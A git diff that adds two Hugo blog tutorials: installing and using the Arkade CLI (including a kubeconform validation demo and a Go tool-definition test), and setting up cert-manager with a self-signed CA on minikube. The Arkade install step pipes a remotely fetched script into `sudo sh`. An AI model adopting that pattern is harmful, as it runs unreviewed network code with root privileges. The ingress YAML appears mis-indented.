diff --git a/content/en/blog/Arkade 2.png b/content/en/blog/Arkade 2.png new file mode 100644 index 0000000..0ca9581 Binary files /dev/null and b/content/en/blog/Arkade 2.png differ diff --git a/content/en/blog/_index 2.md b/content/en/blog/_index 2.md new file mode 100644 index 0000000..a69ea64 --- /dev/null +++ b/content/en/blog/_index 2.md @@ -0,0 +1,6 @@ +--- +title: blog +url: "/blog" +aliases: +- "/blog" +--- diff --git a/content/en/blog/arkade 2.md b/content/en/blog/arkade 2.md new file mode 100644 index 0000000..84a4fde --- /dev/null +++ b/content/en/blog/arkade 2.md @@ -0,0 +1,587 @@ +--- +title : Arkade Open Source Marketplace for Kubernetes +author : Sangam Biradar +categories : + - Kubernetes +weight : 10 +description : add magic to your CLI with Arkade and Increase Productivity +draft : false +Date : 2023-02-13 +author : Sangam Biradar +slug : arkade-open-source-marketplace-for-kubernetes +--- + +{{< rawhtml >}} + + +{{< /rawhtml >}} + +### Getting started with Arkade CLI + +- Macos/Linux + +```bash + +~ curl -sLS https://get.arkade.dev | sudo sh + +Password: +Downloading package https://github.com/alexellis/arkade/releases/download/0.9.7/arkade-darwin-arm64 as /tmp/arkade-darwin-arm64 +Download complete. + +Running with sufficient permissions to attempt to move arkade to /usr/local/bin +New version of arkade installed to /usr/local/bin +Creating alias 'ark' for 'arkade'. + _ _ + __ _ _ __| | ____ _ __| | ___ + / _` | '__| |/ / _` |/ _` |/ _ \ +| (_| | | | < (_| | (_| | __/ + \__,_|_| |_|\_\__,_|\__,_|\___| + +Open Source Marketplace For Developer Tools + +Version: 0.9.7 +Git Commit: 461fb7a9d05d7e3d13a39e03e1e38b6936cb15bd + + 🐳 arkade needs your support: https://github.com/sponsors/alexellis +➜ ~ + +``` + +### Get list of most needed tools & CLI for all Kubenetes Developer + +```bash +➜ ~ arkade get ++------------------+--------------------------------------------------------------+ +| TOOL | DESCRIPTION | ++------------------+--------------------------------------------------------------+ +| actions-usage | Get usage insights from GitHub Actions. | ++------------------+--------------------------------------------------------------+ +| actuated-cli | Official CLI for actuated.dev | ++------------------+--------------------------------------------------------------+ +| argocd | Declarative, GitOps continuous delivery tool for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| argocd-autopilot | An opinionated way of installing Argo-CD and managing GitOps | +| | repositories. | ++------------------+--------------------------------------------------------------+ +| arkade | Portable marketplace for downloading your favourite devops | +| | CLIs and installing helm charts, with a single command. | ++------------------+--------------------------------------------------------------+ +| autok3s | Run Rancher Lab's lightweight Kubernetes distribution k3s | +| | everywhere. | ++------------------+--------------------------------------------------------------+ +| buildx | Docker CLI plugin for extended build capabilities with | +| | BuildKit. | ++------------------+--------------------------------------------------------------+ +| bun | Bun is an incredibly fast JavaScript runtime, bundler, | +| | transpiler and package manager – all in one. 
| ++------------------+--------------------------------------------------------------+ +| butane | Translates human readable Butane Configs into machine | +| | readable Ignition Configs | ++------------------+--------------------------------------------------------------+ +| caddy | Caddy is an extensible server platform that uses TLS by | +| | default | ++------------------+--------------------------------------------------------------+ +| cilium | CLI to install, manage & troubleshoot Kubernetes clusters | +| | running Cilium. | ++------------------+--------------------------------------------------------------+ +| civo | CLI for interacting with your Civo resources. | ++------------------+--------------------------------------------------------------+ +| clusterawsadm | Kubernetes Cluster API Provider AWS Management Utility | ++------------------+--------------------------------------------------------------+ +| clusterctl | The clusterctl CLI tool handles the lifecycle of a Cluster | +| | API management cluster | ++------------------+--------------------------------------------------------------+ +| cmctl | cmctl is a CLI tool that helps you manage cert-manager and | +| | its resources inside your cluster. | ++------------------+--------------------------------------------------------------+ +| conftest | Write tests against structured configuration data using the | +| | Open Policy Agent Rego query language | ++------------------+--------------------------------------------------------------+ +| cosign | Container Signing, Verification and Storage in an OCI | +| | registry. | ++------------------+--------------------------------------------------------------+ +| cr | Hosting Helm Charts via GitHub Pages and Releases | ++------------------+--------------------------------------------------------------+ +| crane | crane is a tool for interacting with remote images and | +| | registries | ++------------------+--------------------------------------------------------------+ +| croc | Easily and securely send things from one computer to another | ++------------------+--------------------------------------------------------------+ +| dagger | A portable devkit for CI/CD pipelines. | ++------------------+--------------------------------------------------------------+ +| devspace | Automate your deployment workflow with DevSpace and develop | +| | software directly inside Kubernetes. | ++------------------+--------------------------------------------------------------+ +| dive | A tool for exploring each layer in a docker image | ++------------------+--------------------------------------------------------------+ +| docker-compose | Define and run multi-container applications with Docker. | ++------------------+--------------------------------------------------------------+ +| doctl | Official command line interface for the DigitalOcean API. | ++------------------+--------------------------------------------------------------+ +| eksctl | Amazon EKS Kubernetes cluster management | ++------------------+--------------------------------------------------------------+ +| eksctl-anywhere | Run Amazon EKS on your own infrastructure | ++------------------+--------------------------------------------------------------+ +| faas-cli | Official CLI for OpenFaaS. 
| ++------------------+--------------------------------------------------------------+ +| firectl | Command-line tool that lets you run arbitrary Firecracker | +| | MicroVMs | ++------------------+--------------------------------------------------------------+ +| flux | Continuous Delivery solution for Kubernetes powered by | +| | GitOps Toolkit. | ++------------------+--------------------------------------------------------------+ +| flyctl | Command line tools for fly.io services | ++------------------+--------------------------------------------------------------+ +| fstail | Tail modified files in a directory. | ++------------------+--------------------------------------------------------------+ +| fzf | General-purpose command-line fuzzy finder | ++------------------+--------------------------------------------------------------+ +| gh | GitHub’s official command line tool. | ++------------------+--------------------------------------------------------------+ +| golangci-lint | Go linters aggregator. | ++------------------+--------------------------------------------------------------+ +| gomplate | A flexible commandline tool for template rendering. Supports | +| | lots of local and remote datasources. | ++------------------+--------------------------------------------------------------+ +| goreleaser | Deliver Go binaries as fast and easily as possible | ++------------------+--------------------------------------------------------------+ +| grafana-agent | Grafana Agent is a telemetry collector for sending | +| | metrics, logs, and trace data to the opinionated Grafana | +| | observability stack. | ++------------------+--------------------------------------------------------------+ +| grype | A vulnerability scanner for container images and filesystems | ++------------------+--------------------------------------------------------------+ +| hadolint | A smarter Dockerfile linter that helps you build best | +| | practice Docker images | ++------------------+--------------------------------------------------------------+ +| helm | The Kubernetes Package Manager: Think of it like | +| | apt/yum/homebrew for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| helmfile | Deploy Kubernetes Helm Charts | ++------------------+--------------------------------------------------------------+ +| hey | Load testing tool | ++------------------+--------------------------------------------------------------+ +| hostctl | Dev tool to manage /etc/hosts like a pro! | ++------------------+--------------------------------------------------------------+ +| hubble | CLI for network, service & security observability for | +| | Kubernetes clusters running Cilium. | ++------------------+--------------------------------------------------------------+ +| hugo | Static HTML and CSS website generator. | ++------------------+--------------------------------------------------------------+ +| influx | InfluxDB’s command line interface (influx) is an interactive | +| | shell for the HTTP API. | ++------------------+--------------------------------------------------------------+ +| inlets-pro | Cloud Native Tunnel for HTTP and TCP traffic. | ++------------------+--------------------------------------------------------------+ +| inletsctl | Automates the task of creating an exit-server (tunnel | +| | server) on public cloud infrastructure. 
| ++------------------+--------------------------------------------------------------+ +| istioctl | Service Mesh to establish a programmable, application-aware | +| | network using the Envoy service proxy. | ++------------------+--------------------------------------------------------------+ +| jq | jq is a lightweight and flexible command-line JSON processor | ++------------------+--------------------------------------------------------------+ +| just | Just a command runner | ++------------------+--------------------------------------------------------------+ +| k0s | Zero Friction Kubernetes | ++------------------+--------------------------------------------------------------+ +| k0sctl | A bootstrapping and management tool for k0s clusters | ++------------------+--------------------------------------------------------------+ +| k10multicluster | Multi-cluster support for K10. | ++------------------+--------------------------------------------------------------+ +| k10tools | Tools for evaluating and debugging K10. | ++------------------+--------------------------------------------------------------+ +| k3d | Helper to run Rancher Lab's k3s in Docker. | ++------------------+--------------------------------------------------------------+ +| k3s | Lightweight Kubernetes | ++------------------+--------------------------------------------------------------+ +| k3sup | Bootstrap Kubernetes with k3s over SSH < 1 min. | ++------------------+--------------------------------------------------------------+ +| k9s | Provides a terminal UI to interact with your Kubernetes | +| | clusters. | ++------------------+--------------------------------------------------------------+ +| kail | Kubernetes log viewer. | ++------------------+--------------------------------------------------------------+ +| kanctl | Framework for application-level data management on | +| | Kubernetes. | ++------------------+--------------------------------------------------------------+ +| kgctl | A CLI to manage Kilo, a multi-cloud network overlay built on | +| | WireGuard and designed for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| kim | Build container images inside of Kubernetes. (Experimental) | ++------------------+--------------------------------------------------------------+ +| kind | Run local Kubernetes clusters using Docker container nodes. | ++------------------+--------------------------------------------------------------+ +| kops | Production Grade K8s Installation, Upgrades, and Management. | ++------------------+--------------------------------------------------------------+ +| krew | Package manager for kubectl plugins. | ++------------------+--------------------------------------------------------------+ +| kube-bench | Checks whether Kubernetes is deployed securely by running | +| | the checks documented in the CIS Kubernetes Benchmark. | ++------------------+--------------------------------------------------------------+ +| kubebuilder | Framework for building Kubernetes APIs using custom resource | +| | definitions (CRDs). | ++------------------+--------------------------------------------------------------+ +| kubecm | Easier management of kubeconfig. 
| ++------------------+--------------------------------------------------------------+ +| kubeconform | A FAST Kubernetes manifests validator, with support for | +| | Custom Resources | ++------------------+--------------------------------------------------------------+ +| kubectl | Run commands against Kubernetes clusters | ++------------------+--------------------------------------------------------------+ +| kubectx | Faster way to switch between clusters. | ++------------------+--------------------------------------------------------------+ +| kubens | Switch between Kubernetes namespaces smoothly. | ++------------------+--------------------------------------------------------------+ +| kubescape | kubescape is the first tool for testing if Kubernetes | +| | is deployed securely as defined in Kubernetes Hardening | +| | Guidance by to NSA and CISA | ++------------------+--------------------------------------------------------------+ +| kubeseal | A Kubernetes controller and tool for one-way encrypted | +| | Secrets | ++------------------+--------------------------------------------------------------+ +| kubestr | Kubestr discovers, validates and evaluates your Kubernetes | +| | storage options. | ++------------------+--------------------------------------------------------------+ +| kubetail | Bash script to tail Kubernetes logs from multiple pods at | +| | the same time. | ++------------------+--------------------------------------------------------------+ +| kubeval | Validate your Kubernetes configuration files, supports | +| | multiple Kubernetes versions | ++------------------+--------------------------------------------------------------+ +| kumactl | kumactl is a CLI to interact with Kuma and its data | ++------------------+--------------------------------------------------------------+ +| kustomize | Customization of kubernetes YAML configurations | ++------------------+--------------------------------------------------------------+ +| lazygit | A simple terminal UI for git commands. | ++------------------+--------------------------------------------------------------+ +| linkerd2 | Ultralight, security-first service mesh for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| mc | MinIO Client is a replacement for ls, cp, mkdir, diff and | +| | rsync commands for filesystems and object storage. | ++------------------+--------------------------------------------------------------+ +| metal | Official Equinix Metal CLI | ++------------------+--------------------------------------------------------------+ +| minikube | Runs the latest stable release of Kubernetes, with support | +| | for standard Kubernetes features. | ++------------------+--------------------------------------------------------------+ +| mixctl | A tiny TCP load-balancer. | ++------------------+--------------------------------------------------------------+ +| mkcert | A simple zero-config tool to make locally trusted | +| | development certificates with any names you'd like. | ++------------------+--------------------------------------------------------------+ +| nats | Utility to interact with and manage NATS. 
| ++------------------+--------------------------------------------------------------+ +| nats-server | Cloud native message bus and queue server | ++------------------+--------------------------------------------------------------+ +| nerdctl | Docker-compatible CLI for containerd, with support for | +| | Compose | ++------------------+--------------------------------------------------------------+ +| nova | Find outdated or deprecated Helm charts running in your | +| | cluster. | ++------------------+--------------------------------------------------------------+ +| oh-my-posh | A prompt theme engine for any shell that can display | +| | kubernetes information. | ++------------------+--------------------------------------------------------------+ +| opa | General-purpose policy engine that enables unified, | +| | context-aware policy enforcement across the entire stack. | ++------------------+--------------------------------------------------------------+ +| operator-sdk | Operator SDK is a tool for scaffolding and generating code | +| | for building Kubernetes operators | ++------------------+--------------------------------------------------------------+ +| osm | Open Service Mesh uniformly manages, secures, and gets | +| | out-of-the-box observability features. | ++------------------+--------------------------------------------------------------+ +| pack | Build apps using Cloud Native Buildpacks. | ++------------------+--------------------------------------------------------------+ +| packer | Build identical machine images for multiple platforms from a | +| | single source configuration. | ++------------------+--------------------------------------------------------------+ +| polaris | Run checks to ensure Kubernetes pods and controllers are | +| | configured using best practices. | ++------------------+--------------------------------------------------------------+ +| popeye | Scans live Kubernetes cluster and reports potential issues | +| | with deployed resources and configurations. | ++------------------+--------------------------------------------------------------+ +| porter | With Porter you can package your application artifact, | +| | tools, etc. as a bundle that can distribute and install. | ++------------------+--------------------------------------------------------------+ +| promtool | Prometheus rule tester and debugging utility | ++------------------+--------------------------------------------------------------+ +| rekor-cli | Secure Supply Chain - Transparency Log | ++------------------+--------------------------------------------------------------+ +| rpk | Kafka compatible streaming platform for mission critical | +| | workloads. | ++------------------+--------------------------------------------------------------+ +| run-job | Run a Kubernetes Job and get the logs when it's done. | ++------------------+--------------------------------------------------------------+ +| scaleway-cli | Scaleway CLI is a tool to help you pilot your Scaleway | +| | infrastructure directly from your terminal. | ++------------------+--------------------------------------------------------------+ +| sops | Simple and flexible tool for managing secrets | ++------------------+--------------------------------------------------------------+ +| stern | Multi pod and container log tailing for Kubernetes. 
| ++------------------+--------------------------------------------------------------+ +| syft | CLI tool and library for generating a Software Bill of | +| | Materials from container images and filesystems | ++------------------+--------------------------------------------------------------+ +| talosctl | The command-line tool for managing Talos Linux OS. | ++------------------+--------------------------------------------------------------+ +| tctl | Temporal CLI. | ++------------------+--------------------------------------------------------------+ +| terraform | Infrastructure as Code for major cloud providers. | ++------------------+--------------------------------------------------------------+ +| terragrunt | Terragrunt is a thin wrapper for Terraform that provides | +| | extra tools for working with multiple Terraform modules | ++------------------+--------------------------------------------------------------+ +| terrascan | Detect compliance and security violations across | +| | Infrastructure as Code. | ++------------------+--------------------------------------------------------------+ +| tfsec | Security scanner for your Terraform code | ++------------------+--------------------------------------------------------------+ +| tilt | A multi-service dev environment for teams on Kubernetes. | ++------------------+--------------------------------------------------------------+ +| tkn | A CLI for interacting with Tekton. | ++------------------+--------------------------------------------------------------+ +| trivy | Vulnerability Scanner for Containers and other Artifacts, | +| | Suitable for CI. | ++------------------+--------------------------------------------------------------+ +| vagrant | Tool for building and distributing development environments. | ++------------------+--------------------------------------------------------------+ +| vault | A tool for secrets management, encryption as a service, and | +| | privileged access management. | ++------------------+--------------------------------------------------------------+ +| vcluster | Create fully functional virtual Kubernetes clusters - Each | +| | vcluster runs inside a namespace of the underlying k8s | +| | cluster. | ++------------------+--------------------------------------------------------------+ +| viddy | A modern watch command. Time machine and pager etc. | ++------------------+--------------------------------------------------------------+ +| waypoint | Easy application deployment for Kubernetes and Amazon ECS | ++------------------+--------------------------------------------------------------+ +| yq | Portable command-line YAML processor. | ++------------------+--------------------------------------------------------------+ +There are 124 tools, use `arkade get NAME` to download one. 
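+# a couple of usage notes, added here as comments (not part of the command output above):
+# several tools can be fetched in one call, and a specific release can usually be pinned with NAME@VERSION, e.g.
+#   arkade get kubectl helm jq
+#   arkade get kubectl@v1.26.3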
+``` + +### Install any above tool with simple syntax + +```bash +arkade get < NAME OF TOOL > +``` + +### lets install one of tool + +kubeconform - A FAST Kubernetes manifests validator, with support for Custom Resources + +```bash +arkade get kubeconform + +``` + +output + + +```bash +Downloading: kubeconform +2023/04/02 10:12:06 Looking up version for kubeconform +2023/04/02 10:12:08 Found: v0.6.1 +Downloading: https://github.com/yannh/kubeconform/releases/download/v0.6.1/kubeconform-darwin-arm64.tar.gz +5.17 MiB / 5.17 MiB [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------] 100.00% +/var/folders/xy/3ssjv1j152x3_0ryt4yb982c0000gn/T/kubeconform-darwin-arm64.tar.gz written. +2023/04/02 10:12:11 Looking up version for kubeconform +2023/04/02 10:12:11 Found: v0.6.1 +2023/04/02 10:12:11 Extracted: /var/folders/xy/3ssjv1j152x3_0ryt4yb982c0000gn/T/kubeconform +2023/04/02 10:12:11 Copying /var/folders/xy/3ssjv1j152x3_0ryt4yb982c0000gn/T/kubeconform to /Users/sangambiradar/.arkade/bin/kubeconform + +Wrote: /Users/sangambiradar/.arkade/bin/kubeconform (9.824MB) + +# Add arkade binary directory to your PATH variable +export PATH=$PATH:$HOME/.arkade/bin/ + +# Test the binary: +/Users/sangambiradar/.arkade/bin/kubeconform + +# Or install with: +sudo mv /Users/sangambiradar/.arkade/bin/kubeconform /usr/local/bin/ + +🐳 arkade needs your support: https://github.com/sponsors/alexellis +➜ ~ export PATH=$PATH:$HOME/.arkade/bin/ +➜ ~ /Users/sangambiradar/.arkade/bin/kubeconform +2023/04/02 10:12:35 failing to read data from stdin +➜ ~ sudo mv /Users/sangambiradar/.arkade/bin/kubeconform /usr/local/bin/ +Password: +➜ ~ kubeconform +2023/04/02 10:13:00 failing to read data from stdin +➜ ~ kubeconform -h +Usage: kubeconform [OPTION]... [FILE OR FOLDER]... + -cache string + cache schemas downloaded via HTTP to this folder + -debug + print debug information + -exit-on-error + immediately stop execution when the first error is encountered + -h show help information + -ignore-filename-pattern value + regular expression specifying paths to ignore (can be specified multiple times) + -ignore-missing-schemas + skip files with missing schemas instead of failing + -insecure-skip-tls-verify + disable verification of the server's SSL certificate. 
This will make your HTTPS connections insecure + -kubernetes-version string + version of Kubernetes to validate against, e.g.: 1.18.0 (default "master") + -n int + number of goroutines to run concurrently (default 4) + -output string + output format - json, junit, tap, text (default "text") + -reject string + comma-separated list of kinds or GVKs to reject + -schema-location value + override schemas location search path (can be specified multiple times) + -skip string + comma-separated list of kinds or GVKs to ignore + -strict + disallow additional properties not in schema or duplicated keys + -summary + print a summary at the end (ignored for junit output) + -v show version information + -verbose + print results for all resources (ignored for tap and junit output) + +``` + +### lets create ngnix deployement and validate kubernetes manifest + +```yaml +apiVersion: v1 +kind: ReplicationController +metadata: + name: "bob" +spec: + replicas: asd" + selector: + app: nginx + templates: + metadata: + name: nginx + labels: + app: nginx + spec: + containers: + - name: nginx + image: nginx + ports: + - containerPort: 80 +``` + +### check it out if above kubenetes menifest Valid or not with Summary in Json format + +```bash +kubeconform -summary -output json ngnix.yaml +{ + "resources": [ + { + "filename": "ngnix.yaml", + "kind": "ReplicationController", + "name": "bob", + "version": "v1", + "status": "statusInvalid", + "msg": "problem validating schema. Check JSON formatting: jsonschema: '/spec/replicas' does not validate with https://raw.githubusercontent.com/yannh/kubernetes-json-schema/master/master-standalone/replicationcontroller-v1.json#/properties/spec/properties/replicas/type: expected integer or null, but got string", + "validationErrors": [ + { + "path": "/spec/replicas", + "msg": "expected integer or null, but got string" + } + ] + } + ], + "summary": { + "valid": 0, + "invalid": 1, + "errors": 0, + "skipped": 0 + } +} +``` +### add and contribute your favourite cloudNative Tool To arkade + +here is example one of tool - https://github.com/tenable/terrascan + + +- append your tool with dyanamic templating you will find lot of examples here to learn :- https://github.com/alexellis/arkade/blob/master/pkg/get/tools.go + +```bash +tools = append(tools, Tool{ +Owner: "tenable", +Repo: "terrascan", +Name: "terrascan", +Description: "Detect compliance and security violations across Infrastructure as Code.", BinaryTemplate: ` +{{$osStr := ""}} +{{ if HasPrefix .OS "ming" -}} +{{$osStr = "Windows"}} +{{- else if eq .OS "linux" -}} +{{$osStr = "Linux"}} +{{- else if eq .OS "darwin" -}} +{{$osStr = "Darwin"}} +{{- end -}} +{{$archStr := .Arch}} +{{- if eq .Arch "aarch64" -}} +{{$archStr = "arm64"}} +{{- else if eq .Arch "x86_64" -}} +{{$archStr = "x86_64"}} +{{- end -}} +{{.Name}}_{{slice .Version 1}}_{{$osStr}}_{{$archStr}}.tar.gz`, +}) +return tools } + +``` + +### write test cases for above tool + +```bash +func Test_DownloadTerrascan(t *testing.T) { tools := MakeTools() +name := "terrascan" +tool := getTool(name, tools) +tests := []test{ +{ +os: "darwin", +arch: arch64bit, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Darwin_x86_64.tar.gz`, +}, +{ +os: "darwin", +arch: archARM64, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Darwin_arm64.tar.gz`, +}, +{ +os: "linux", +arch: arch64bit, +version: "v1.11.0", +url: 
`https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Linux_x86_64.tar.gz`, +}, +{ +os: "linux", +arch: archARM64, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Linux_arm64.tar.gz`, +}, +{ +os: "ming", +arch: arch64bit, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Windows_x86_64.tar.gz`, +}, } +for _, tc := range tests { +t.Run(tc.os+" "+tc.arch+" "+tc.version, func(r *testing.T) { +got, err := tool.GetURL(tc.os, tc.arch, tc.version, false) if err != nil { +t.Fatal(err) } +if got != tc.url { +t.Errorf("want: %s, got: %s", tc.url, got) } +}) } +} + +``` + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) \ No newline at end of file diff --git a/content/en/blog/certmanager/certmanager 2.png b/content/en/blog/certmanager/certmanager 2.png new file mode 100644 index 0000000..1618bfe Binary files /dev/null and b/content/en/blog/certmanager/certmanager 2.png differ diff --git a/content/en/blog/certmanager/index 2.md b/content/en/blog/certmanager/index 2.md new file mode 100644 index 0000000..3575f4f --- /dev/null +++ b/content/en/blog/certmanager/index 2.md @@ -0,0 +1,385 @@ +--- +title : CertManager - Automatically provision and manage TLS certificates in Kubernetes +author : Sangam Biradar +categories : + - Kubernetes +weight : 20 +description : cert-manager adds certificates and certificate issuers as resource types in Kubernetes clusters, and simplifies the process of obtaining, renewing and using those certificates. +draft : false +Date : 2023-02-14 +author : Sangam Biradar +--- + + + + + +{{< rawhtml >}} + +
+{{< /rawhtml >}} + +### Start Minikube +``` +minikube-certmanager git:(main) minikube start +πŸ˜„ minikube v1.30.0 on Darwin 13.3.1 (arm64) +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸƒ Updating the running docker "minikube" container ... +❗ Image was not built for the current minikube version. To resolve this you can delete and recreate your minikube cluster using the latest images. Expected minikube version: v1.29.0 -> Actual minikube version: v1.30.0 +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”Ž Verifying Kubernetes components... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +🌟 Enabled addons: storage-provisioner, default-storageclass +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default +``` + +### add jetstack helm +``` +➜ minikube-certmanager git:(main) helm repo add jetstack https://charts.jetstack.io +"jetstack" has been added to your repositories +``` + +### update helm charts +``` +➜ minikube-certmanager git:(main) helm repo update +Hang tight while we grab the latest from your chart repositories... +...Successfully got an update from the "jetstack" chart repository +Update Complete. ⎈Happy Helming!⎈ +``` + +### Install cert-manger CRD on test namespace +``` +➜ minikube-certmanager git:(main) helm install \ + cert-manager jetstack/cert-manager \ + --namespace test \ + --create-namespace \ + --version v1.11.1 \ + --set installCRDs=true +NAME: cert-manager +LAST DEPLOYED: Fri Apr 14 12:35:31 2023 +NAMESPACE: test +STATUS: deployed +REVISION: 1 +TEST SUITE: None +NOTES: +cert-manager v1.11.1 has been deployed successfully! + +In order to begin issuing certificates, you will need to set up a ClusterIssuer +or Issuer resource (for example, by creating a 'letsencrypt-staging' issuer). + +More information on the different types of issuers and how to configure them +can be found in our documentation: + +https://cert-manager.io/docs/configuration/ + +For information on how to configure cert-manager to automatically provision +Certificates for Ingress resources, take a look at the `ingress-shim` +documentation: + +https://cert-manager.io/docs/usage/ingress/ + +``` + +### verify test namespace is active + +``` +➜ minikube-certmanager git:(main) kubectl get ns +NAME STATUS AGE +default Active 16h +kube-node-lease Active 16h +kube-public Active 16h +kube-system Active 16h +test Active 4m31s +``` + +### create self-signered certificate issuer + +creating a self-signed certificate that our CA will use. To do so we will first need to create a self-signed certificate issuer. + + +```yml +apiVersion: cert-manager.io/v1 +kind: Issuer +metadata: + name: selfsigned-issuer + namespace: test +spec: + selfSigned: {} +``` +### kubectl apply cert manager ss issuer + +``` +minikube-certmanager git:(main) βœ— kubectl create -f cert-manager-ss-issuer.yaml +issuer.cert-manager.io/selfsigned-issuer created +``` +### creat CA certificate + + +``` +apiVersion: cert-manager.io/v1 +kind: Certificate +metadata: + name: test-ca + namespace: test +spec: + isCA: true + commonName: test-ca + subject: + organizations: + - ACME Inc. 
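+    # organizations / organizationalUnits map to the O / OU attributes of the issued certificate's subject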
+ organizationalUnits: + - Widgets + secretName: test-ca-secret + privateKey: + algorithm: ECDSA + size: 256 + issuerRef: + name: selfsigned-issuer + kind: Issuer + group: cert-manager.io + +``` + +### kubectl apply cert-manager-ca-cert +``` +➜ minikube-certmanager git:(main) βœ— kubectl create -f cert-manager-ca-cert.yaml +certificate.cert-manager.io/test-ca created +``` +### checkt it out certificate +``` +➜ minikube-certmanager git:(main) βœ— kubectl -n test get certificate +NAME READY SECRET AGE +test-ca True test-ca-secret 4m15s +``` +### check it out secrets +``` +➜ minikube-certmanager git:(main) βœ— kubectl -n test get secret test-ca-secret +NAME TYPE DATA AGE +test-ca-secret kubernetes.io/tls 3 5m1s +``` +Excellent! This secret contains the ca.crt, tls.crt, and tls.key that belong to the CA itself. + +### create ca issuer + +Now it’s time to create our CA issuer. Create a file called cert-manager-ca-issuer.yaml with the following: + +``` +apiVersion: cert-manager.io/v1 +kind: Issuer +metadata: + name: test-ca-issuer + namespace: test +spec: + ca: + secretName: test-ca-secret +``` + +### apply ca issuer +``` +➜ minikube-certmanager git:(main) βœ— kubectl create -f cer +t-manager-ca-issuer.yaml +issuer.cert-manager.io/test-ca-issuer created +``` +### test ca cert + +``` +apiVersion: cert-manager.io/v1 +kind: Certificate +metadata: + name: test-server + namespace: test +spec: + secretName: test-server-tls + isCA: false + usages: + - server auth + - client auth + dnsNames: + - "test-server.test.svc.cluster.local" + - "test-server" + issuerRef: + name: test-ca-issuer +--- +apiVersion: cert-manager.io/v1 +kind: Certificate +metadata: + name: test-client + namespace: test +spec: + secretName: test-client-tls + isCA: false + usages: + - server auth + - client auth + dnsNames: + - "test-client.test.svc.cluster.local" + - "test-client" + issuerRef: + name: test-ca-issuer + +``` +### test server cert +``` +➜ minikube-certmanager git:(main) βœ— kubectl create -f test-server-cert.yaml +certificate.cert-manager.io/test-server created +certificate.cert-manager.io/test-client created +``` +### verify CA with Openssl +``` +➜ minikube-certmanager git:(main) βœ— openssl verify -CAfile \ +<(kubectl -n test get secret test-ca-secret -o jsonpath='{.data.ca\.crt}' | base64 -d) \ +<(kubectl -n test get secret test-server-tls -o jsonpath='{.data.tls\.crt}' | base64 -d) +/dev/fd/16: OK +/dev/fd/13: OK + +``` +### start openssl server get secrets tls + +``` + +minikube-certmanager git:(main) βœ— echo Hello World! 
> test.txt +minikube-certmanager git:(main) βœ— openssl s_server \ + -cert <(kubectl -n test get secret test-server-tls -o jsonpath='{.data.tls\.crt}' | base64 -d) \ + -key <(kubectl -n test get secret test-server-tls -o jsonpath='{.data.tls\.key}' | base64 -d) \ + -CAfile <(kubectl -n test get secret test-server-tls -o jsonpath='{.data.ca\.crt}' | base64 -d) \ + -WWW -port 12345 \ + -verify_return_error -Verify 1 +verify depth is 1, must return a certificate +Using auto DH parameters +ACCEPT +``` +### verify certificate working + +``` + ➜ minikube-certmanager git:(main) βœ— echo -e 'GET /test.txt HTTP/1.1\r\n\r\n' | \ + openssl s_client \ + -cert <(kubectl -n test get secret test-client-tls -o jsonpath='{.data.tls\.crt}' | base64 -d) \ + -key <(kubectl -n test get secret test-client-tls -o jsonpath='{.data.tls\.key}' | base64 -d) \ + -CAfile <(kubectl -n test get secret test-client-tls -o jsonpath='{.data.ca\.crt}' | base64 -d) \ + -connect localhost:12345 -quiet +depth=1 O = ACME Inc., OU = Widgets, CN = test-ca +verify return:1 +depth=0 +verify return:1 +HTTP/1.0 200 ok +Content-type: text/plain + +Hello World! +``` +### enable ingress on minikube +``` +➜ minikube-certmanager git:(main) βœ— minikube addons enable ingress +πŸ’‘ ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub. +You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS +πŸ’‘ After the addon is enabled, please run "minikube tunnel" and your ingress resources would be available at "127.0.0.1" + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/controller:v1.7.0 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 +πŸ”Ž Verifying ingress addon... +🌟 The 'ingress' addon is enabled + +``` +### Echo Server Setup with CA Signed Certificate + +``` +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: echo + name: echo + namespace: test +spec: + replicas: 1 + selector: + matchLabels: + app: echo + template: + metadata: + labels: + app: echo + spec: + containers: + - name: echo + image: fdeantoni/echo-server + imagePullPolicy: Always + ports: + - containerPort: 9000 + readinessProbe: + httpGet: + path: / + port: 9000 + initialDelaySeconds: 5 + periodSeconds: 5 + successThreshold: 1 +--- +apiVersion: v1 +kind: Service +metadata: + name: echo-service + namespace: test +spec: + selector: + app: echo + ports: + - name: http + protocol: TCP + port: 9000 + targetPort: 9000 +--- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: echo-ingress + namespace: test + annotations: + cert-manager.io/issuer: test-ca-issuer +spec: + rules: + - http: + paths: + - path: /test + pathType: Prefix + backend: + service: + name: echo-service + port: + number: 9000 +tls: +- hosts: + - echo.info + secretName: echo-cert + +``` + +### deploy echo service + +``` +➜ minikube-certmanager git:(main) βœ— kubectl create -f echo-server.yaml +deployment.apps/echo created +service/echo-service created +``` +### start minikube tunnel +``` +➜ minikube-certmanager git:(main) βœ— minikube tunnel +βœ… Tunnel successfully started + +πŸ“Œ NOTE: Please do not close this terminal as this process must stay alive for the tunnel to be accessible ... +``` + +### echo service works with our CA signed 